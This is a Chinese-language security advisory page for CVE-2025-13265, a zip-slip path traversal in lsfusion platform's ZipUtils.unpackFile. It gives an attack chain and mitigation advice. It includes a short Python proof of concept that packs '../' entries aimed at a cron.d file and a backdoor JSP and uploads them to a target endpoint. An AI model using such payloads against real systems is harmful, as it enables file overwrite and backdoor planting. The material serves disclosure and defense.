CVE-2025-13265 CVSS 6.3 中危

CVE-2025-13265 lsfusion platform路径遍历漏洞

披露日期: 2025-11-17

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13265

漏洞类型

路径遍历

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

lsfusion platform

漏洞概述

lsfusion platform 6.1及之前版本中存在路径遍历漏洞，源于ZipUtils.java的unpackFile函数未正确验证文件路径。攻击者可通过构造恶意ZIP文件利用此漏洞，在系统上写入或读取任意文件。该漏洞允许远程低权限用户无需交互即可利用，对系统机密性、完整性和可用性产生低至中等程度影响。

技术细节

漏洞位于lsfusion/server/physics/dev/integration/external/to/file/ZipUtils.java的unpackFile方法。攻击者构造包含路径遍历载荷的ZIP文件，通过lsfusion平台的文件上传功能触发解压操作。解压时未验证文件名中的../序列，导致文件被提取到目标目录之外。攻击者可利用此漏洞覆盖系统配置文件、植入恶意代码或读取敏感文件。

攻击链分析

STEP 1

信息收集

识别目标系统运行的lsfusion platform版本

STEP 2

构造恶意ZIP

创建包含路径遍历载荷的ZIP文件

STEP 3

上传触发

通过文件上传接口提交恶意ZIP文件

STEP 4

路径遍历执行

解压时../序列导致文件写入目标目录外

STEP 5

达成攻击目的

覆盖配置文件或植入后门代码

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import zipfile
import io

# 构造包含路径遍历载荷的恶意ZIP文件
malicious_zip = io.BytesIO()
with zipfile.ZipFile(malicious_zip, 'w') as zf:
    # 使用../遍历目录
    zf.writestr('../../../etc/cron.d/malicious', 'malicious cron job')
    zf.writestr('../../webapp/backdoor.jsp', 'malicious code')

malicious_zip.seek(0)

# 通过lsfusion的文件上传接口提交恶意ZIP
response = requests.post(
    'https://target/lsfusion/api/upload',
    files={'file': ('malicious.zip', malicious_zip, 'application/zip')},
    auth=('lowpriv_user', 'password')
)

影响范围

lsfusion platform <= 6.1

防御指南

临时缓解措施

暂时禁用文件上传功能或部署WAF规则阻止包含路径遍历载荷的上传请求

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13265
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13265
3 Details https://www.cvedetails.com/cve/CVE-2025-13265/
4 VulDB https://vuldb.com/cve/CVE-2025-13265
5 Link https://github.com/lsfusion/platform/issues/1545
6 Link https://vuldb.com/?ctiid.332600
7 Link https://vuldb.com/?id.332600
8 Link https://vuldb.com/?submit.689427

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表